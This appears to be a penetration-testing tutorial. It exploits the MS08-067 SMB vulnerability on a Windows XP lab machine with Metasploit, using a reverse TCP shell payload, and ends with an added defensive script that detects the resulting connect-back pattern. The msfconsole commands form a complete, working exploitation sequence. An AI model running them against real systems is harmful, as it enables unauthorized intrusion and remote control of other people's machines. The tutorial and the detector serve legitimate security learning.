Let's start.
Remember, before we do the exploitation, we have to go through Information Gathering, Service Enumeration, and Vulnerability Assessment. These steps must be done!
From those three steps, we will be able to find a hole that we can exploit.
By using Nessus, we will be able to find some high-severity holes that we can exploit. As an example, I will exploit an SMB vulnerability on port 445.
1. Open Metasploit's msfconsole from the BackTrack tools menu under Exploitation Tools, or just open a terminal and type msfconsole.
2. Then type the commands below.
msf > set payload windows/shell/reverse_tcp
msf > use exploit/windows/smb/ms08_067_netapi
4. Then use the set command for LHOST, filling in our own IP address.
msf exploit(ms08_067_netapi) > set lhost 192.168.56.1
5. Set RHOST to the IP address of the target.
msf exploit(ms08_067_netapi) > set rhost 192.168.56.101
6. Type show options to check that everything is filled in.
msf exploit(ms08_067_netapi) > show options
7. If every option marked "yes" in the Required column is filled in, everything is set and the Windows target is ready for exploitation. Just type exploit as below.
msf exploit(ms08_067_netapi) > exploit
Windows XP is under control.
8. Okay, to test it, we will try to create a directory on Windows XP. I'm creating a new folder on the desktop named MetasploitTest. And this is the result...
The folder MetasploitTest has been created.
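Seen from the defender's side, the reverse_tcp payload used above leaves a simple network pattern: a host receives a connection on SMB port 445 and, moments later, opens a connection back to the same peer. The following sketch correlates that pattern in a connection log; it is an added example, not part of the original post, and the log format, the 30-second window, port 4444 and all sample lines are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed connection log: time, source IP, destination IP, destination port.
# 192.168.56.1 and 192.168.56.101 are the walkthrough's LHOST and RHOST;
# every other address, port 4444 and all timestamps are made up for the example.
SAMPLE_LOG = """\
2024-01-01T10:00:00 192.168.56.1 192.168.56.101 445
2024-01-01T10:00:03 192.168.56.101 192.168.56.1 4444
2024-01-01T10:05:00 192.168.56.20 192.168.56.101 445
2024-01-01T10:20:00 192.168.56.101 192.168.56.20 80
2024-01-01T10:30:00 192.168.56.101 192.168.56.30 445
"""


def parse(log_text):
    """Yield (time, src, dst, dport) from whitespace-separated log lines."""
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            yield datetime.fromisoformat(ts), src, dst, int(dport)


def find_connect_backs(log_text, smb_port=445, window=timedelta(seconds=30)):
    """Flag hosts that connect back to a peer soon after that peer reached their SMB port."""
    last_smb = {}  # (smb_server, client) -> time of the latest inbound SMB connection
    alerts = []
    for ts, src, dst, dport in sorted(parse(log_text)):
        if dport == smb_port:
            last_smb[(dst, src)] = ts
            continue
        seen = last_smb.get((src, dst))
        if seen is not None and ts - seen <= window:
            alerts.append({
                "host": src,
                "peer": dst,
                "port": dport,
                "delay_s": int((ts - seen).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_connect_backs(SAMPLE_LOG):
        print("possible reverse shell:", alert)
```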